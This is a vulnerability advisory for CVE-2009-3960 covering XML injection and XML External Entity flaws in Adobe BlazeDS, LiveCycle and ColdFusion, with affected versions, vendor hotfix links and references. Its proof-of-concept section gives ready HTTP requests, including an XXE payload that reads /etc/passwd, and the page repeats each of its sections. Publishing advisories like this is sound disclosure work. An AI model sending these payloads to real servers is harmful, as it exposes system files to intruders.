Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
BID:38197
Info
Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
| Bugtraq ID: | 38197 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3960 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 11 2010 12:00AM |
| Updated: | Mar 05 2010 09:02PM |
| Credit: | Roberto Suggi Liverani of Security-Assessment.com |
| Vulnerable: |
Adobe LiveCycle Data Services 2.6.1 Adobe LiveCycle Data Services 2.5.1 Adobe LiveCycle Data Services 3.0 Adobe LiveCycle 8.2.1 Adobe LiveCycle 8.0.1 Adobe LiveCycle 9.0 Adobe Flex Data Services 2.0.1 Adobe ColdFusion 8.0.1 Adobe ColdFusion 7.0.2 Adobe ColdFusion 9.0 Adobe ColdFusion 8.0 Adobe ColdFusion 8 Adobe BlazeDS 3.2 |
| Not Vulnerable: | |
Discussion
Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
Adobe BlazeDS is prone to an XML-injection vulnerability and an XML External Entity injection vulnerability.
Attackers can exploit these issues to obtain sensitive information and carry out other attacks.
The following applications are affected:
BlazeDS 3.2 and earlier versions
LiveCycle 9.0, 8.2.1, and 8.0.1
LiveCycle Data Services 3.0, 2.6.1, and 2.5.1
Flex Data Services 2.0.1
ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2
Adobe BlazeDS is prone to an XML-injection vulnerability and an XML External Entity injection vulnerability.
Attackers can exploit these issues to obtain sensitive information and carry out other attacks.
The following applications are affected:
BlazeDS 3.2 and earlier versions
LiveCycle 9.0, 8.2.1, and 8.0.1
LiveCycle Data Services 3.0, 2.6.1, and 2.5.1
Flex Data Services 2.0.1
ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2
Exploit / POC
Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
The following example AMFX requests are available:
1. XML External Entity injection:
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
2. XML injection
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d&quot; injectedattr=&quot;anything"><null/>
</body></amfx>
The following example AMFX requests are available:
1. XML External Entity injection:
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
2. XML injection
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d&quot; injectedattr=&quot;anything"><null/>
</body></amfx>
Solution / Fix
Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
Solution:
The vendor has released an advisory and updates. Please see the references for details.
UPDATE (February 18, 2010): Updated fixes for ColdFusion are available. Please see the references for more information.
Adobe LiveCycle Data Services 3.0
Adobe ColdFusion 9.0
Adobe ColdFusion 8
Adobe LiveCycle 9.0
Adobe ColdFusion 8.0
Adobe BlazeDS 3.2
Adobe Flex Data Services 2.0.1
Adobe LiveCycle Data Services 2.5.1
Adobe LiveCycle Data Services 2.6.1
Adobe ColdFusion 7.0.2
Adobe LiveCycle 8.0.1
Adobe ColdFusion 8.0.1
Adobe LiveCycle 8.2.1
Solution:
The vendor has released an advisory and updates. Please see the references for details.
UPDATE (February 18, 2010): Updated fixes for ColdFusion are available. Please see the references for more information.
Adobe LiveCycle Data Services 3.0
-
Adobe lcds3_hf_262986.zip
http://download.macromedia.com/pub/security/bulletins/lcds3_hf_262986. zip
Adobe ColdFusion 9.0
-
Adobe Coldfusion9BlazeDS.zip
http://kb2.adobe.com/cps/822/cpsid_82241/attachments/Coldfusion9BlazeD S.zip -
Adobe Coldfusion9LCDS.zip
http://kb2.adobe.com/cps/822/cpsid_82241/attachments/Coldfusion9LCDS.z ip
Adobe ColdFusion 8
-
Adobe Coldfusion8LCDS.zip
http://kb2.adobe.com/cps/822/cpsid_82241/attachments/Coldfusion8LCDS.z ip
Adobe LiveCycle 9.0
-
Adobe livecycle9_0.zip
http://download.macromedia.com/pub/security/bulletins/livecycle9_0.zip
Adobe ColdFusion 8.0
-
Adobe Coldfusion8LCDS.zip
http://kb2.adobe.com/cps/822/cpsid_82241/attachments/Coldfusion8LCDS.z ip
Adobe BlazeDS 3.2
-
Adobe blz32_hf_12617.zip
http://download.macromedia.com/pub/security/bulletins/blz32_hf_12617.z ip
Adobe Flex Data Services 2.0.1
-
Adobe fds201_hf_262793b.zip
http://download.macromedia.com/pub/security/bulletins/fds201_hf_262793 b.zip
Adobe LiveCycle Data Services 2.5.1
-
Adobe lcds251_hf_262793.zip
http://download.macromedia.com/pub/security/bulletins/lcds251_hf_26279 3.zip
Adobe LiveCycle Data Services 2.6.1
-
Adobe lcds261_hf_262977.zip
http://download.macromedia.com/pub/security/bulletins/lcds261_hf_26297 7.zip
Adobe ColdFusion 7.0.2
-
Adobe Coldfusion7.zip
http://kb2.adobe.com/cps/822/cpsid_82241/attachments/Coldfusion7.zip -
Adobe Coldfusion7FlexDS.zip
http://kb2.adobe.com/cps/822/cpsid_82241/attachments/Coldfusion7FlexDS .zip
Adobe LiveCycle 8.0.1
-
Adobe livecycle8_0_1.zip
http://download.macromedia.com/pub/security/bulletins/livecycle8_0_1.z ip
Adobe ColdFusion 8.0.1
-
Adobe Coldfusion8LCDS.zip
http://kb2.adobe.com/cps/822/cpsid_82241/attachments/Coldfusion8LCDS.z ip
Adobe LiveCycle 8.2.1
-
Adobe livecycle8_2_1.zip
http://download.macromedia.com/pub/security/bulletins/livecycle8_2_1.z ip
References
Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
References:
References:
- Adobe Homepage (Adobe)
- BlazeDS Homepage (Adobe)
- Multiple Adobe Products �?? XML External Entity Injection And XML Injection (Security-Assessment.com)
- ColdFusion : Security Bulletin APSB10-05 (Adobe)
- Security update available for BlazeDS (Adobe)